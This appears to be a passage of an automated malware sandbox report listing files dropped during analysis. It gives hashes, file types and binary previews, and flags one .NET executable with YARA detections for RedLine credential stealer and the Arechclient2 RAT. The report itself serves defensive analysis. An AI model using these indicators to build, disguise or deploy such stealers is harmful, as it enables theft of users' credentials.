                                                                                                                                                                                                                                                                                      SSDEEP:24576:lvd4C+K336Ixx9jAF8BfdI7X5gEII/RHQRZz2oXKEP4LbBVdlZElV7:F6eqIx/g8xeaEHlQRd2kYbBVNElV7
                                                                                                                                                                                                                                                                                      MD5:932367769B66D6CB4E2A024612FD9383
                                                                                                                                                                                                                                                                                      SHA1:D53C138CCB4EE2F57A0D48B70CDF549C5DB8BB40
                                                                                                                                                                                                                                                                                      SHA-256:9247C761E56BAB6CBF54D5B0CB73FDECD13D411087E63A9B27E4A6941E75E21C
                                                                                                                                                                                                                                                                                      SHA-512:06E343E7BE7C80176F0741DD4D4C57373381B855B454F1B9AE2E483A84D0C2E0A44D2E9981AA35625C2F2F92F8953C7985B31FA16E71AF0993194C23D30768F1
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:X...Z...[...[...Z.......O...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...~.......~..8.4...4......./...5...).:...../...[...[...[...[...[...[...[...[...[...[...[.....2...7.....[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[.....>...:.[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...~........).=.....).,.[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...[...-...u...i...[...[...[...[...[...[...[...[...[...[...

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\fak

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):785920
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.809737341976147
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12288:QiMA0ejRLfxLY8flLb1MgXeXbFAsFWylkkoAbtEIwhsrU:QeDxttLeLFAsFlSjf
                                                                                                                                                                                                                                                                                      MD5:33230F52772BD46C208DFE85537F567F
                                                                                                                                                                                                                                                                                      SHA1:260AAB3C0DD5909C449B62DA56998F8ABD68A235
                                                                                                                                                                                                                                                                                      SHA-256:3F1759A3D89D7B7893BBCDEB180BAB911C960A6D1C80A04BCDA199A8284C36EA
                                                                                                                                                                                                                                                                                      SHA-512:98E3B0337ABD53BA405F76D1FCE17F9EC173C507B3DD3B89A259950AEE744FB337767BC534E817BF1DB7D5B692245DC5A3CF351BED06980DDEE2B0F19A48B10B
                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\fak, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\fak, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\fak, Author: ditekSHen
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 59%
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....,T............................~.... ........@.. .......................`..............................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H............=..............H............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~).....UY.).... .....7...%.....~(.....[Y.)....sr...~).....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~).....SY.)......~).....RY.)....~0...%-.&~/.........su...%.0...(...+}....*.0........... ....X..{M...*..0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.1.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4632
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.487772826240471
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:LQ5P5uBA7uREQ7z62mbLhC0PKPKPKPIQPIQPIQPEPEPEPzPzPzPwEFUuqfRO:LQ7LiREQ7z62mbLhvPKPKPKPIQPIQPI7
                                                                                                                                                                                                                                                                                      MD5:947DAAAB3E35944427EA3683353719C1
                                                                                                                                                                                                                                                                                      SHA1:D68FAC7D60B30D5FD20295485BD5163193D332DC
                                                                                                                                                                                                                                                                                      SHA-256:5F1777E8E7FF4E6D921E4E7AE44DC513E9710F8A3E27E291C7C227A91EE884BB
                                                                                                                                                                                                                                                                                      SHA-512:5FB12711D33AEF6718F88984EF447BACC0F3CCEBA7830D22AD720DFBE7F51CE6E54CF91CCD294135CCB46E690849DB1E02D80847C9A91927858C0BFA2713B1E3
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[04/23/24 09:28:20] Main : OS Version = osWin10...[04/23/24 09:28:20] CommandLineSwitchExists : Result of check = False. Param Value (if not exact match) = ...[04/23/24 09:28:21] Installer Target URL request = {"IPAddress":"192.168.2.5","Status":1,"Language":"en","OSMinorVersion":0,"OSMajorVersion":10,"ProductId":"5488CB36-BE62-4606-B07B-2EE938868BD1","Is64Bit":true,"ECommId":"11A12794-499E-4FA0-A281-A9A9AA8B2685"}...[04/23/24 09:28:22] Installer target url response = {"Url":"https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe","ProductName":"System Mechanic Standard","Result":0,"ErrorMessage":null}...[04/23/24 09:28:22] DownloadAndLaunchInstaller : Creating BITS download handler...[04/23/24 09:28:22] !&TioloBITSHandler.InitCopyMgr : CreateCOMObject(CLSID_BackgroundCopyManager1_5)..[04/23/24 09:28:26] !&TioloBITSHandler.InitCopyMgr : Copy manager initialized = True...[04/23/24 09:28:26] DownloadAndLaunchInstaller : Target folder ="C:\User

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\pkrvj

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Apr 23 06:28:17 2024, mtime=Tue Apr 23 06:28:17 2024, atime=Tue Apr 23 06:28:17 2024, length=2469936, window=hide
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):987
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.021798558909191
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:8wY2fnz8MZ6TmuAOU7mnydAnB4SaUCuzF93fm:8wdY3mKWmndXWIz3f
                                                                                                                                                                                                                                                                                      MD5:62CF6F5E7DC517A5DA0C555F7FBBC4DB
                                                                                                                                                                                                                                                                                      SHA1:B6109F890AD91FCF8B2893EFB3163F885E530583
                                                                                                                                                                                                                                                                                      SHA-256:A8A16C5239098D23D1B4E0768AC4C052008E992F533AAF516AF65CB8163DC5FC
                                                                                                                                                                                                                                                                                      SHA-512:8B705ED0911C1C09D433EE180CCAE29DE1FDE23034C22F42768D276856EBE79F68E6F8259ED677B9731CF5012904156AD2A95988900AA66652D63E3CFFE112EE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:L..................F.... .......O......O...F.:.O...0.%.......................:..DG..Yr?.D..U..k0.&...&...... M........O......O.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.X{;....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......X.;..Roaming.@......DWSl.X.;....C.....................kx..R.o.a.m.i.n.g.....n.1......X.;..DRIVER~1..V......X.;.X.;..............................d.r.i.v.e.r.R.e.m.o.t.e._.d.e.b.u.g.....z.2.0.%..X.; .UNIVER~1.EXE..^......X.;.X.;....=.......................q.U.n.i.v.e.r.s.a.l.I.n.s.t.a.l.l.e.r...e.x.e.......x...............-.......w............U.S.....C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe..7.....\.....\.R.o.a.m.i.n.g.\.d.r.i.v.e.r.R.e.m.o.t.e._.d.e.b.u.g.\.U.n.i.v.e.r.s.a.l.I.n.s.t.a.l.l.e.r...e.x.e.`.......X.......494126...........hT..CrF.f4... ..2=.b...,...W..hT..CrF.f4... ..2=.b...,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp29BA.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp29CA.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp29CB.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp3A7C.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8439810553697228
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                                                                                                                                                                      MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                                                                                                                                                                      SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                                                                                                                                                                      SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                                                                                                                                                                      SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp673E.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp74CC.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp7C55.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8439810553697228
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                                                                                                                                                                      MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                                                                                                                                                                      SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                                                                                                                                                                      SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                                                                                                                                                                      SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp851.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8439810553697228
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                                                                                                                                                                      MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                                                                                                                                                                      SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                                                                                                                                                                      SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                                                                                                                                                                      SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp98A7.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp98A8.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp98B8.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmpA26A.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\u3z0.0.exe

                                                                                                                                                                                                                                                                                      Download File
